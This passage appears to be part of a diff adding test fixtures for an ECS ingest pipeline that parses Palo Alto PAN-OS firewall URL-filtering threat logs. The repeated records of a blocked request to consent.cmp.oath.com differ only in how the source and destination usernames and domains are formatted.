] + }, + "labels": { + "nat_translated": true, + "temporary_match": true + }, + "log": { + "level": "informational" + }, + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,nt-autorit..t\\src_username,nt-autorit..t\\dst_username,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "network": { + "application": "ssl", + "community_id": [ + "1:uw+iNVMmjYN9VAmQZQDw4+dyarA=", + "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + ], + "direction": "inbound", + "transport": "tcp", + "type": "ipv4" + }, + "observer": { + "egress": { + "interface": { + "name": "ethernet1/1" + }, + "zone": "untrust" + }, + "hostname": "PA-220", + "ingress": { + "interface": { + "name": "ethernet1/2" + }, + "zone": "trust" + }, + "product": "PAN-OS", + "serial_number": "012801096514", + "type": "firewall", + "vendor": "Palo Alto Networks" + }, + "panw": { + "panos": { + "action": "block-url", + "action_flags": "0x2000000000000000", + "content_version": "AppThreat-0-0", + "device_group_hierarchy1": "0", + "device_group_hierarchy2": "0", + "device_group_hierarchy3": "0", + "device_group_hierarchy4": "0", + "flow_id": "28191", + "imsi": "0", + "log_profile": "send_to_mac", + "logged_time": "2018-11-30T16:44:36.000+09:30", + "network": { + "nat": { + "community_id": "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + } + }, + "parent_session": { + "id": "0" + }, + "payload_protocol_id": "4294967295", + "repeat_count": 1, + "ruleset": "new_outbound_from_trust", + "sctp": { + "assoc_id": "0" + }, + "sequence_number": "7726", + "sub_type": "url", + "threat": { + "id": "9999", + "name": "URL-filtering" + }, + "threat_category": "unknown", + "tunnel_type": "N/A", + "type": "THREAT", + "url": { + "category": "business-and-economy" + }, + "url_idx": "0", + "virtual_sys": "vsys1", + "wildfire": { + "report_id": "0" + } + } + }, + "related": { + "hosts": [ + "PA-220" + ], + "ip": [ + "192.168.15.224", + "175.16.199.1", + "192.168.1.63" + ], + "user": [ + "src_username", + "dst_username" + ] + }, + "rule": { + "name": "new_outbound_from_trust" + }, + "source": { + "geo": { + "name": "192.168.0.0-192.168.255.255" + }, + "ip": "192.168.15.224", + "nat": { + "ip": "192.168.1.63", + "port": 37679 + }, + "port": 52984, + "user": { + "domain": "nt-autorit..t", + "name": "src_username" + } + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "consent.cmp.oath.com", + "original": "consent.cmp.oath.com/", + "path": "/" + }, + "user": { + "domain": "nt-autorit..t", + "name": "src_username" + } + }, + { + "@timestamp": "2018-11-30T16:44:36.000+09:30", + "destination": { + "domain": "consent.cmp.oath.com", + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "name": "United States", + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "nat": { + "ip": "175.16.199.1", + "port": 443 + }, + "port": 443, + "user": { + "domain": ".", + "name": "dst_username" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "url_filtering", + "category": [ + "intrusion_detection", + "threat", + "network" + ], + "created": "2018-11-30T16:44:36.000+09:30", + "kind": "alert", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,.\\src_username,.\\dst_username,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "outcome": "failure", + "severity": 5, + "timezone": "+09:30", + "type": [ + "denied" + ] + }, + "labels": { + "nat_translated": true, + "temporary_match": true + }, + "log": { + "level": "informational" + }, + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,.\\src_username,.\\dst_username,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "network": { + "application": "ssl", + "community_id": [ + "1:uw+iNVMmjYN9VAmQZQDw4+dyarA=", + "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + ], + "direction": "inbound", + "transport": "tcp", + "type": "ipv4" + }, + "observer": { + "egress": { + "interface": { + "name": "ethernet1/1" + }, + "zone": "untrust" + }, + "hostname": "PA-220", + "ingress": { + "interface": { + "name": "ethernet1/2" + }, + "zone": "trust" + }, + "product": "PAN-OS", + "serial_number": "012801096514", + "type": "firewall", + "vendor": "Palo Alto Networks" + }, + "panw": { + "panos": { + "action": "block-url", + "action_flags": "0x2000000000000000", + "content_version": "AppThreat-0-0", + "device_group_hierarchy1": "0", + "device_group_hierarchy2": "0", + "device_group_hierarchy3": "0", + "device_group_hierarchy4": "0", + "flow_id": "28191", + "imsi": "0", + "log_profile": "send_to_mac", + "logged_time": "2018-11-30T16:44:36.000+09:30", + "network": { + "nat": { + "community_id": "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + } + }, + "parent_session": { + "id": "0" + }, + "payload_protocol_id": "4294967295", + "repeat_count": 1, + "ruleset": "new_outbound_from_trust", + "sctp": { + "assoc_id": "0" + }, + "sequence_number": "7726", + "sub_type": "url", + "threat": { + "id": "9999", + "name": "URL-filtering" + }, + "threat_category": "unknown", + "tunnel_type": "N/A", + "type": "THREAT", + "url": { + "category": "business-and-economy" + }, + "url_idx": "0", + "virtual_sys": "vsys1", + "wildfire": { + "report_id": "0" + } + } + }, + "related": { + "hosts": [ + "PA-220" + ], + "ip": [ + "192.168.15.224", + "175.16.199.1", + "192.168.1.63" + ], + "user": [ + "src_username", + "dst_username" + ] + }, + "rule": { + "name": "new_outbound_from_trust" + }, + "source": { + "geo": { + "name": "192.168.0.0-192.168.255.255" + }, + "ip": "192.168.15.224", + "nat": { + "ip": "192.168.1.63", + "port": 37679 + }, + "port": 52984, + "user": { + "domain": ".", + "name": "src_username" + } + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "consent.cmp.oath.com", + "original": "consent.cmp.oath.com/", + "path": "/" + }, + "user": { + "domain": ".", + "name": "src_username" + } + }, + { + "@timestamp": "2018-11-30T16:44:36.000+09:30", + "destination": { + "domain": "consent.cmp.oath.com", + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "name": "United States", + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "nat": { + "ip": "175.16.199.1", + "port": 443 + }, + "port": 443, + "user": { + "domain": "dst-domainname", + "name": "dst_username" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "url_filtering", + "category": [ + "intrusion_detection", + "threat", + "network" + ], + "created": "2018-11-30T16:44:36.000+09:30", + "kind": "alert", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src-domainname\\\\src_username,dst-domainname\\\\dst_username,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "outcome": "failure", + "severity": 5, + "timezone": "+09:30", + "type": [ + "denied" + ] + }, + "labels": { + "nat_translated": true, + "temporary_match": true + }, + "log": { + "level": "informational" + }, + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src-domainname\\\\src_username,dst-domainname\\\\dst_username,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "network": { + "application": "ssl", + "community_id": [ + "1:uw+iNVMmjYN9VAmQZQDw4+dyarA=", + "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + ], + "direction": "inbound", + "transport": "tcp", + "type": "ipv4" + }, + "observer": { + "egress": { + "interface": { + "name": "ethernet1/1" + }, + "zone": "untrust" + }, + "hostname": "PA-220", + "ingress": { + "interface": { + "name": "ethernet1/2" + }, + "zone": "trust" + }, + "product": "PAN-OS", + "serial_number": "012801096514", + "type": "firewall", + "vendor": "Palo Alto Networks" + }, + "panw": { + "panos": { + "action": "block-url", + "action_flags": "0x2000000000000000", + "content_version": "AppThreat-0-0", + "device_group_hierarchy1": "0", + "device_group_hierarchy2": "0", + "device_group_hierarchy3": "0", + "device_group_hierarchy4": "0", + "flow_id": "28191", + "imsi": "0", + "log_profile": "send_to_mac", + "logged_time": "2018-11-30T16:44:36.000+09:30", + "network": { + "nat": { + "community_id": "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + } + }, + "parent_session": { + "id": "0" + }, + "payload_protocol_id": "4294967295", + "repeat_count": 1, + "ruleset": "new_outbound_from_trust", + "sctp": { + "assoc_id": "0" + }, + "sequence_number": "7726", + "sub_type": "url", + "threat": { + "id": "9999", + "name": "URL-filtering" + }, + "threat_category": "unknown", + "tunnel_type": "N/A", + "type": "THREAT", + "url": { + "category": "business-and-economy" + }, + "url_idx": "0", + "virtual_sys": "vsys1", + "wildfire": { + "report_id": "0" + } + } + }, + "related": { + "hosts": [ + "PA-220" + ], + "ip": [ + "192.168.15.224", + "175.16.199.1", + "192.168.1.63" + ], + "user": [ + "src_username", + "dst_username" + ] + }, + "rule": { + "name": "new_outbound_from_trust" + }, + "source": { + "geo": { + "name": "192.168.0.0-192.168.255.255" + }, + "ip": "192.168.15.224", + "nat": { + "ip": "192.168.1.63", + "port": 37679 + }, + "port": 52984, + "user": { + "domain": "src-domainname", + "name": "src_username" + } + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "consent.cmp.oath.com", + "original": "consent.cmp.oath.com/", + "path": "/" + }, + "user": { + "domain": "src-domainname", + "name": "src_username" + } + }, + { + "@timestamp": "2018-11-30T16:44:36.000+09:30", + "destination": { + "domain": "consent.cmp.oath.com", + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "name": "United States", + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "nat": { + "ip": "175.16.199.1", + "port": 443 + }, + "port": 443, + "user": { + "domain": "dst-domainname", + "name": "dst_username" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "url_filtering", + "category": [ + "intrusion_detection", + "threat", + "network" + ], + "created": "2018-11-30T16:44:36.000+09:30", + "kind": "alert", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src_username@src-domainname,dst_username@dst-domainname,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "outcome": "failure", + "severity": 5, + "timezone": "+09:30", + "type": [ + "denied" + ] + }, + "labels": { + "nat_translated": true, + "temporary_match": true + }, + "log": { + "level": "informational" + }, + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src_username@src-domainname,dst_username@dst-domainname,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "network": { + "application": "ssl", + "community_id": [ + "1:uw+iNVMmjYN9VAmQZQDw4+dyarA=", + "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + ], + "direction": "inbound", + "transport": "tcp", + "type": "ipv4" + }, + "observer": { + "egress": { + "interface": { + "name": "ethernet1/1" + }, + "zone": "untrust" + }, + "hostname": "PA-220", + "ingress": { + "interface": { + "name": "ethernet1/2" + }, + "zone": "trust" + }, + "product": "PAN-OS", + "serial_number": "012801096514", + "type": "firewall", + "vendor": "Palo Alto Networks" + }, + "panw": { + "panos": { + "action": "block-url", + "action_flags": "0x2000000000000000", + "content_version": "AppThreat-0-0", + "device_group_hierarchy1": "0", + "device_group_hierarchy2": "0", + "device_group_hierarchy3": "0", + "device_group_hierarchy4": "0", + "flow_id": "28191", + "imsi": "0", + "log_profile": "send_to_mac", + "logged_time": "2018-11-30T16:44:36.000+09:30", + "network": { + "nat": { + "community_id": "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + } + }, + "parent_session": { + "id": "0" + }, + "payload_protocol_id": "4294967295", + "repeat_count": 1, + "ruleset": "new_outbound_from_trust", + "sctp": { + "assoc_id": "0" + }, + "sequence_number": "7726", + "sub_type": "url", + "threat": { + "id": "9999", + "name": "URL-filtering" + }, + "threat_category": "unknown", + "tunnel_type": "N/A", + "type": "THREAT", + "url": { + "category": "business-and-economy" + }, + "url_idx": "0", + "virtual_sys": "vsys1", + "wildfire": { + "report_id": "0" + } + } + }, + "related": { + "hosts": [ + "PA-220" + ], + "ip": [ + "192.168.15.224", + "175.16.199.1", + "192.168.1.63" + ], + "user": [ + "src_username", + "dst_username" + ] + }, + "rule": { + "name": "new_outbound_from_trust" + }, + "source": { + "geo": { + "name": "192.168.0.0-192.168.255.255" + }, + "ip": "192.168.15.224", + "nat": { + "ip": "192.168.1.63", + "port": 37679 + }, + "port": 52984, + "user": { + "domain": "src-domainname", + "name": "src_username" + } + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "consent.cmp.oath.com", + "original": "consent.cmp.oath.com/", + "path": "/" + }, + "user": { + "domain": "src-domainname", + "name": "src_username" + } + }, + { + "@timestamp": "2018-11-30T16:44:36.000+09:30", + "destination": { + "domain": "consent.cmp.oath.com", + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "name": "United States", + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "nat": { + "ip": "175.16.199.1", + "port": 443 + }, + "port": 443, + "user": { + "name": "dst_username" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "url_filtering", + "category": [ + "intrusion_detection", + "threat", + "network" + ], + "created": "2018-11-30T16:44:36.000+09:30", + "kind": "alert", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src_username,dst_username,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "outcome": "failure", + "severity": 5, + "timezone": "+09:30", + "type": [ + "denied" + ] + }, + "labels": { + "nat_translated": true, + "temporary_match": true + }, + "log": { + "level": "informational" + }, + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src_username,dst_username,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "network": { + "application": "ssl", + "community_id": [ + "1:uw+iNVMmjYN9VAmQZQDw4+dyarA=", + "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + ], + "direction": "inbound", + "transport": "tcp", + "type": "ipv4" + }, + "observer": { + "egress": { + "interface": { + "name": "ethernet1/1" + }, + "zone": "untrust" + }, + "hostname": "PA-220", + "ingress": { + "interface": { + "name": "ethernet1/2" + }, + "zone": "trust" + }, + "product": "PAN-OS", + "serial_number": "012801096514", + "type": "firewall", + "vendor": "Palo Alto Networks" + }, + "panw": { + "panos": { + "action": "block-url", + "action_flags": "0x2000000000000000", + "content_version": "AppThreat-0-0", + "device_group_hierarchy1": "0", + "device_group_hierarchy2": "0", + "device_group_hierarchy3": "0", + "device_group_hierarchy4": "0", + "flow_id": "28191", + "imsi": "0", + "log_profile": "send_to_mac", + "logged_time": "2018-11-30T16:44:36.000+09:30", + "network": { + "nat": { + "community_id": "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + } + }, + "parent_session": { + "id": "0" + }, + "payload_protocol_id": "4294967295", + "repeat_count": 1, + "ruleset": "new_outbound_from_trust", + "sctp": { + "assoc_id": "0" + }, + "sequence_number": "7726", + "sub_type": "url", + "threat": { + "id": "9999", + "name": "URL-filtering" + }, + "threat_category": "unknown", + "tunnel_type": "N/A", + "type": "THREAT", + "url": { + "category": "business-and-economy" + }, + "url_idx": "0", + "virtual_sys": "vsys1", + "wildfire": { + "report_id": "0" + } + } + }, + "related": { + "hosts": [ + "PA-220" + ], + "ip": [ + "192.168.15.224", + "175.16.199.1", + "192.168.1.63" + ], + "user": [ + "src_username", + "dst_username" + ] + }, + "rule": { + "name": "new_outbound_from_trust" + }, + "source": { + "geo": { + "name": "192.168.0.0-192.168.255.255" + }, + "ip": "192.168.15.224", + "nat": { + "ip": "192.168.1.63", + "port": 37679 + }, + "port": 52984, + "user": { + "name": "src_username" + } + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "consent.cmp.oath.com", + "original": "consent.cmp.oath.com/", + "path": "/" + }, + "user": { + "name": "src_username" + } + }, + { + "@timestamp": "2018-11-30T16:44:36.000+09:30", + "destination": { + "domain": "consent.cmp.oath.com", + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "name": "United States", + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "nat": { + "ip": "175.16.199.1", + "port": 443 + }, + "port": 443 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "url_filtering", + "category": [ + "intrusion_detection", + "threat", + "network" + ], + "created": "2018-11-30T16:44:36.000+09:30", + "kind": "alert", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,x-fwd-for: 10.10.10.50,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "outcome": "failure", + "severity": 5, + "timezone": "+09:30", + "type": [ + "denied" + ] + }, + "labels": { + "nat_translated": true, + "temporary_match": true + }, + "log": { + "level": "informational" + }, + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,x-fwd-for: 10.10.10.50,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "network": { + "application": "ssl", + "community_id": [ + "1:uw+iNVMmjYN9VAmQZQDw4+dyarA=", + "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + ], + "direction": "inbound", + "transport": "tcp", + "type": "ipv4" + }, + "observer": { + "egress": { + "interface": { + "name": "ethernet1/1" + }, + "zone": "untrust" + }, + "hostname": "PA-220", + "ingress": { + "interface": { + "name": "ethernet1/2" + }, + "zone": "trust" + }, + "product": "PAN-OS", + "serial_number": "012801096514", + "type": "firewall", + "vendor": "Palo Alto Networks" + }, + "panw": { + "panos": { + "action": "block-url", + "action_flags": "0x2000000000000000", + "content_version": "AppThreat-0-0", + "device_group_hierarchy1": "0", + "device_group_hierarchy2": "0", + "device_group_hierarchy3": "0", + "device_group_hierarchy4": "0", + "flow_id": "28191", + "imsi": "0", + "log_profile": "send_to_mac", + "logged_time": "2018-11-30T16:44:36.000+09:30", + "network": { + "nat": { + "community_id": "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + } + }, + "parent_session": { + "id": "0" + }, + "payload_protocol_id": "4294967295", + "repeat_count": 1, + "ruleset": "new_outbound_from_trust", + "sctp": { + "assoc_id": "0" + }, + "sequence_number": "7726", + "sub_type": "url", + "threat": { + "id": "9999", + "name": "URL-filtering" + }, + "threat_category": "unknown", + "tunnel_type": "N/A", + "type": "THREAT", + "url": { + "category": "business-and-economy" + }, + "url_idx": "0", + "virtual_sys": "vsys1", + "wildfire": { + "report_id": "0" + } + } + }, + "related": { + "hosts": [ + "PA-220" + ], + "ip": [ + "192.168.15.224", + "175.16.199.1", + "192.168.1.63" + ], + "user": [ + "x-fwd-for: 10.10.10.50" + ] + }, + "rule": { + "name": "new_outbound_from_trust" + }, + "source": { + "geo": { + "name": "192.168.0.0-192.168.255.255" + }, + "ip": "192.168.15.224", + "nat": { + "ip": "192.168.1.63", + "port": 37679 + }, + "port": 52984, + "user": { + "name": "x-fwd-for: 10.10.10.50" + } + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "consent.cmp.oath.com", + "original": "consent.cmp.oath.com/", + "path": "/" + }, + "user": { + "name": "x-fwd-for: 10.10.10.50" + } + }, + { + "@timestamp": "2018-11-30T16:44:36.000+09:30", + "destination": { + "domain": "consent.cmp.oath.com", + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "name": "United States", + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "nat": { + "ip": "175.16.199.1", + "port": 443 + }, + "port": 443, + "user": { + "domain": "dst_domainname", + "name": "dst-user#name" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "url_filtering", + "category": [ + "intrusion_detection", + "threat", + "network" + ], + "created": "2018-11-30T16:44:36.000+09:30", + "kind": "alert", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src_domainname\\\\src-user#name,dst_domainname\\\\dst-user#name,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "outcome": "failure", + "severity": 5, + "timezone": "+09:30", + "type": [ + "denied" + ] + }, + "labels": { + "nat_translated": true, + "temporary_match": true + }, + "log": { + "level": "informational" + }, + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src_domainname\\\\src-user#name,dst_domainname\\\\dst-user#name,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "network": { + "application": "ssl", + "community_id": [ + "1:uw+iNVMmjYN9VAmQZQDw4+dyarA=", + "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + ], + "direction": "inbound", + "transport": "tcp", + "type": "ipv4" + }, + "observer": { + "egress": { + "interface": { + "name": "ethernet1/1" + }, + "zone": "untrust" + }, + "hostname": "PA-220", + "ingress": { + "interface": { + "name": "ethernet1/2" + }, + "zone": "trust" + }, + "product": "PAN-OS", + "serial_number": "012801096514", + "type": "firewall", + "vendor": "Palo Alto Networks" + }, + "panw": { + "panos": { + "action": "block-url", + "action_flags": "0x2000000000000000", + "content_version": "AppThreat-0-0", + "device_group_hierarchy1": "0", + "device_group_hierarchy2": "0", + "device_group_hierarchy3": "0", + "device_group_hierarchy4": "0", + "flow_id": "28191", + "imsi": "0", + "log_profile": "send_to_mac", + "logged_time": "2018-11-30T16:44:36.000+09:30", + "network": { + "nat": { + "community_id": "1:JXH5QeRl6+F+lTj/JOTAPn5Yegk=" + } + }, + "parent_session": { + "id": "0" + }, + "payload_protocol_id": "4294967295", + "repeat_count": 1, + "ruleset": "new_outbound_from_trust", + "sctp": { + "assoc_id": "0" + }, + "sequence_number": "7726", + "sub_type": "url", + "threat": { + "id": "9999", + "name": "URL-filtering" + }, + "threat_category": "unknown", + "tunnel_type": "N/A", + "type": "THREAT", + "url": { + "category": "business-and-economy" + }, + "url_idx": "0", + "virtual_sys": "vsys1", + "wildfire": { + "report_id": "0" + } + } + }, + "related": { + "hosts": [ + "PA-220" + ], + "ip": [ + "192.168.15.224", + "175.16.199.1", + "192.168.1.63" + ], + "user": [ + "src-user#name", + "dst-user#name" + ] + }, + "rule": { + "name": "new_outbound_from_trust" + }, + "source": { + "geo": { + "name": "192.168.0.0-192.168.255.255" + }, + "ip": "192.168.15.224", + "nat": { + "ip": "192.168.1.63", + "port": 37679 + }, + "port": 52984, + "user": { + "domain": "src_domainname", + "name": "src-user#name" + } + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "consent.cmp.oath.com", + "original": "consent.cmp.oath.com/", + "path": "/" + }, + "user": { + "domain": "src_domainname", + "name": "src-user#name" + } + }, + { + "@timestamp": "2018-11-30T16:44:36.000+09:30", + "destination": { + "domain": "consent.cmp.oath.com", + "geo": { + "city_name": "Changchun", + "continent_name": "Asia", + "country_iso_code": "CN", + "country_name": "China", + "location": { + "lat": 43.88, + "lon": 125.3228 + }, + "name": "United States", + "region_iso_code": "CN-22", + "region_name": "Jilin Sheng" + }, + "ip": "175.16.199.1", + "nat": { + "ip": "175.16.199.1", + "port": 443 + }, + "port": 443, + "user": { + "domain": "dst_domain..name", + "name": "dst-user#name" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "url_filtering", + "category": [ + "intrusion_detection", + "threat", + "network" + ], + "created": "2018-11-30T16:44:36.000+09:30", + "kind": "alert", + "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,src_domain..name\\\\src-user#name,dst_domain..name\\\\dst-user#name,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 